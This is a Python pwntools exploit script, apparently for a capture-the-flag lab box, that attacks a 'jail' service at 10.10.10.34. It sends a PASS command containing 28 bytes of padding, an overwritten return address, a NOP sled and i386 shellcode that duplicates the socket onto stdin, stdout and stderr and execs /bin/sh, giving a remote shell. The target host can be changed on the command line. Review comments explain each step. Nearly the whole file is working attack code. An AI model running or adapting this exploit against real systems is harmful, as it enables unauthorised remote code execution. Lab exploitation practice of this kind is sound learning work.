- import struct
- from pwn import *
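# Lab target for the `jail` service.  HOST may be overridden from the pwntools
# command line further down; PORT is fixed.
HOST = "10.10.10.34"
PORT = 7411
# NOTE(review): the original also opened a bare socket.socket() and connect()ed
# it to HOST:PORT here, then never touched it again -- every send/recv in this
# script goes through the pwntools tube `r`.  That left one idle, never-closed
# connection to the target per run (and, if the service forks per client, a
# second handler process to reason about), so it has been dropped.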
def p(x):
    """Pack ``x`` as a 4-byte little-endian unsigned integer (same as pwntools' ``p32``).

    Raises ``struct.error`` if ``x`` is negative or does not fit in 32 bits.
    Kept for parity with the original script; the payload below uses pwntools'
    ``pack`` instead.
    """
    u32_le = struct.Struct('<I')
    return u32_le.pack(x)
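context(os='linux', arch='i386')

# Target selection.  `args` is pwntools' command-line dict (run as
# `python exploit.py HOST=1.2.3.4` or `LOCAL=1`); keys that were not given
# read back as ''.  A HOST on the command line overrides the lab default,
# and LOCAL=1 runs ./jail from the working directory instead of connecting
# out.  The original re-assigned the hard-coded HOST right after reading
# args, so its `process('./jail')` branch could never be reached.
HOST = args['HOST'] or "10.10.10.34"
print(args['HOST'])
if args['LOCAL']:
    r = process('./jail')
else:
    r = remote(HOST, PORT)

# Wait for the banner, then log in.  sendline() appends '\n' itself, so the
# command carries no newline of its own (the original sent "USER admin\n\n",
# i.e. the command followed by a blank line).
r.recvuntil(b'OK Ready. Send USER command.\n')
r.sendline(b'USER admin')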
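# Stack overflow in the PASS handler: 28 bytes fill the local buffer and the
# next 4 overwrite the saved return address.  0x0804910f is presumably a
# jmp/call-esp style trampoline in the (non-PIE) binary so that execution
# lands in the sled that follows -- TODO confirm against a disassembly before
# reusing this offset/address on another build.
padding = b"A" * 28
eip = pack(0x804910f)  # 4-byte little-endian because of context(arch='i386')

# i386 Linux shellcode (decoded by hand from the bytes; verify with disasm()):
#   eax = dup(2) - 1           guess the client socket fd; assumes the socket is
#                              the highest-numbered fd open in the handler
#   dup2(eax, 0) / 1 / 2       wire stdin/stdout/stderr to that socket
#   execve("/bin//sh", 0, 0)
# Byte literals keep the payload exact on both Python 2 and 3; a str literal
# would be re-encoded (and corrupted) when sent under Python 3.
shellcode = (
    b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
    b"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
    b"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
    b"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x31\xc9\xcd\x80"
)
nops = b"\x90" * 42  # sled so a slightly-off landing still reaches the shellcode

# sendline() adds the terminating '\n'; the original appended a second one,
# which only adds a stray byte after the shellcode.
r.sendline(b"PASS " + padding + eip + nops + shellcode)
r.interactive()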